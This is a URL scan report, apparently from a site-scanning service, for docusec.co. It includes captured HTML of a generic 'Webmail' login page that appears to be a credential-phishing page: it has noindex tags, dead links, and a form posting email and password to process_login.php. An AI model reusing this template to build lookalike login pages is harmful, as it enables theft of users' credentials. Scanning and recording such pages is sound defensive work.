https://docusec.co/

ID de exploración:
ca73f644-9379-4cb3-a24c-9dab8b462807Finalizado
URL enviada:
https://docusec.co/
Informe finalizado:

Enlaces: 0 encontrados

Variables JavaScript: 3 encontradas

NombreTipo
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject

Mensajes de registro de la consola: 1 encontrados

TipoCategoríaRegistro
verbosedom
URL
https://docusec.co/
Texto
[DOM] Input elements should have autocomplete attributes (suggested: "current-password"): (More info: https://goo.gl/9p2vKq) %o

HTML

<!DOCTYPE html><html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
        <title>Login Page</title>
        <meta name="robots" content="noindex">
        <meta name="robots" content="noindex, nofollow">
        <meta name="robots" content="noimageindex">
        <meta name="googlebot" content="noindex">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <style>
        /* Styling as in previous code */
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f0f0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            flex-direction: column;
        }
        img.logo {
            width: 550px; /* Adjust width as needed */
            height: auto; /* Maintain aspect ratio */
            margin-bottom: 46px; /* Spacing below the logo */
            margin-left: 94px;
        }
        .input-group {
            position: relative;
            margin-bottom: 15px;
            width: 300px; /* Adjust width as needed */
        }
        .input-group label {
            margin-bottom: 10px;
            font-size: 16px;
            display: block;
            color: #333;
        }
        .input-group input {
            width: 100%;
            padding: 10px 40px 10px 40px;
            border: 1px solid #ccc;
            border-radius: 5px;
        }
        .input-group i {
            position: absolute;
            left: 10px;
            top: 70%;
            transform: translateY(-50%);
            color: #999;
        }
        .button-container {
            display: flex;
            justify-content: center;
            width: 100%; /* Make sure it takes full width */
        }
        button {
            width: 100%; /* Make button take full width of container */
            max-width: 377px; /* Limit the button's max width */
            padding: 10px;
            background-color: #007BFF;
            border: none;
            border-radius: 5px;
            color: white;
            font-size: 16px;
            cursor: pointer;
            margin-top: 10px; /* Added margin for spacing */
            margin-left: 82px;
        }
        button:hover {
            background-color: #0056b3;
        }
        .reset-password {
            margin-top: 44px; /* Increased spacing between button and link */
            margin-bottom: 50px;
            text-align: center;
            margin-left: 68px;
        }
        .reset-password a {
            color: #4c5156;
            text-decoration: none;
        }
        .reset-password a:hover {
            text-decoration: underline;
        }
        .language-select {
            margin-top: 20px;
            margin-left: 70px;
            margin-bottom: 50px;
            text-align: center;
        }
        .language-select a {
            margin: 0 10px;
            font-size: 14px;
            margin-top: 150px;
            color: rgb(118, 105, 105);
            text-decoration: none;
        }
        .language-select a:hover {
            color: orange;
            text-decoration: underline;
        }
    </style>
</head>
<body>

    <img src="https://jgz0ka.webwave.dev/lib/jgz0ka/Webmail_logo-m27pzlvj.png" alt="webmail" class="logo">
    
    <form action="process_login.php" method="POST">
        <div class="input-group">
            <label for="username">Email address </label>
            <i class="fas fa-user"></i>
            <input type="text" id="username" name="username" placeholder="Enter your email" autocomplete="on" required="">
        </div>
        <div class="input-group">
            <label for="password">Password</label>
            <i class="fas fa-lock"></i>
            <input type="password" id="password" name="password" placeholder="Enter your password" required="">
        </div>
        <div class="button-container">
            <button type="submit">Login</button>
        </div>
    </form>
    
    <div class="reset-password">
        <a href="#">Reset Password</a>
    </div>
    <div class="language-select">
        <label for="language"></label>
        <div id="language">
            <a href="#">English</a>
            <a href="#">Spanish</a>
            <a href="#">French</a>
            <a href="#">German</a>
            <a href="#">Chinese</a>
            <a href="#">Japanese</a>
            <a href="#">Arabic</a>
            <a href="#">Portuguese</a>
        </div>
    </div>


</body></html>